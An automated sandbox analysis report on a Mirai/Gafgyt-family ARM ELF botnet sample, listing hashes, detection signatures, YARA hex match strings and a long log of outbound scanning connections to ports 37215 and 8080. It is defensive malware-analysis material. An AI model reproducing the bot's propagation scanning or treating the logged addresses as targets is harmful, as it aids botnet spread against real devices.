Create Interactive Tour

Linux Analysis Report
mods.arm7.elf

Overview

General Information

Sample Name:mods.arm7.elf
Analysis ID:1341989
MD5:538b81b1398b9f34f48c6652889f3cd8
SHA1:47218fcab46734665478d865fed5bacb3d571473
SHA256:b0117f65e7255e7f519e53ce0454c17f61e0c9e9fb47d520ee046cebe37cff98
Infos:

Detection

Mirai
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Uses known network protocols on non-standard ports
Contains symbols with names commonly found in malware
Sample tries to kill multiple processes (SIGKILL)
Yara signature match
Yara detected Mirai
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1341989
Start date and time:2023-11-13 22:17:17 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:mods.arm7.elf
Detection:MAL
Classification:mal84.spre.troj.linELF@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: mods.arm7.elf
Command:/tmp/mods.arm7.elf
PID:6206
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Infected By Cult
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
mods.arm7.elfJoeSecurity_Mirai_2Yara detected MiraiJoe Security
    mods.arm7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      mods.arm7.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1675c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16770:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16784:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16798:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x167ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x167c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x167d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x167e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x167fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16810:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16824:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16838:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1684c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16860:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16874:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16888:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1689c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x168b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x168c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x168d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x168ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      mods.arm7.elfLinux_Trojan_Gafgyt_ea92cca8unknownunknown
      • 0x16cb4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
      SourceRuleDescriptionAuthorStrings
      6219.1.00007f803c017000.00007f803c030000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        6219.1.00007f803c017000.00007f803c030000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x1675c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16770:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16784:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16798:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x167ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x167c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x167d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x167e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x167fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16810:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16824:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16838:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1684c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16860:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16874:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x16888:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1689c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x168b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x168c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x168d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x168ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        6219.1.00007f803c017000.00007f803c030000.r-x.sdmpLinux_Trojan_Gafgyt_ea92cca8unknownunknown
        • 0x16cb4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
        6210.1.00007f803c017000.00007f803c030000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6210.1.00007f803c017000.00007f803c030000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1675c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16770:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16784:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16798:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x167ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x167c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x167d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x167e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x167fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16810:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16824:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16838:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1684c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16860:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16874:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x16888:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1689c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x168b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x168c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x168d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x168ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Click to see the 38 entries
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: mods.arm7.elfAvira: detected
          Source: mods.arm7.elfReversingLabs: Detection: 65%

          Networking

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 51286 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 51286
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.189.6.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.106.55.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.26.230.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.21.215.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.113.48.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.102.123.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.220.14.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.116.66.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.228.59.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.97.69.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.221.246.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.95.105.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.208.62.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.206.190.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.76.228.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.129.122.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.64.36.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.44.38.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.22.93.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.137.90.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.88.1.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.2.69.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.6.252.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.121.172.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.83.149.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.33.204.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.196.149.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.207.205.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.237.242.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.253.243.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.47.93.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.173.10.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.215.119.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.178.38.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.231.198.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.27.253.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.213.38.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.31.248.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.93.112.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.177.235.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.12.71.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.74.7.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.23.247.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.164.74.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.49.126.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.187.50.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.62.183.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.47.164.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.91.102.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.174.252.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.46.53.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.246.165.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.202.182.197:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.33.177.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.49.238.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.209.174.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.21.198.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.205.138.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.78.3.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.20.222.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.0.101.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.141.98.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.234.120.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.35.7.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.241.222.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.104.167.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.37.189.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.92.179.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.44.33.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.31.122.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.28.235.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.138.84.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.206.129.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.88.52.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.202.123.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.94.225.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.126.210.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.144.209.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.51.84.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.175.17.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.226.45.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.149.39.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.193.36.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.181.40.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.202.153.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.60.169.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.113.195.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.50.88.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.40.23.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.252.79.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.93.181.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.25.210.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.173.107.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.169.142.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.86.252.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.1.19.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.127.212.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.231.71.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.254.227.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.214.236.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.94.174.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.50.70.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.35.33.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.49.71.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.172.204.143:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.225.12.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.102.121.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.220.18.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.11.76.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.197.178.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.46.18.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.17.28.124:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.218.191.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.180.175.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.199.161.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.31.227.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.146.218.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.32.147.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.135.33.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.131.73.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.195.23.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.214.26.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.187.2.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.239.49.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.245.112.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.101.87.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.199.197.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.184.254.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.11.222.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.97.117.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.229.130.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.127.13.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.67.223.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.185.196.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.84.76.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.23.115.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.75.146.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.78.183.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.74.48.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.165.184.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.104.43.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.168.226.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.231.193.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.102.69.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.152.190.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.129.68.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.15.223.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.90.9.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.129.191.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.144.187.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.255.72.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.191.228.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.205.46.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.54.16.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.100.167.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.225.251.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.98.51.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.173.142.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.181.90.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:12660 -> 157.236.6.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.102.171.187:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.176.90.187:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.73.10.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.231.74.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.227.156.149:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.63.97.62:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.224.161.121:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.95.67.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.251.43.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.15.104.224:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.25.161.95:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.82.196.216:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.243.228.33:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.44.118.4:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.242.104.106:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.250.28.93:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.4.11.7:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.12.192.159:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.202.220.33:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.232.183.143:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.176.225.137:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 62.36.169.223:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.134.165.225:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 85.70.147.171:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.101.27.167:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.224.175.11:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.9.142.180:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 94.161.217.179:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 95.119.42.30:8080
          Source: global trafficTCP traffic: 192.168.2.23:13948 -> 31.228.127.33:8080
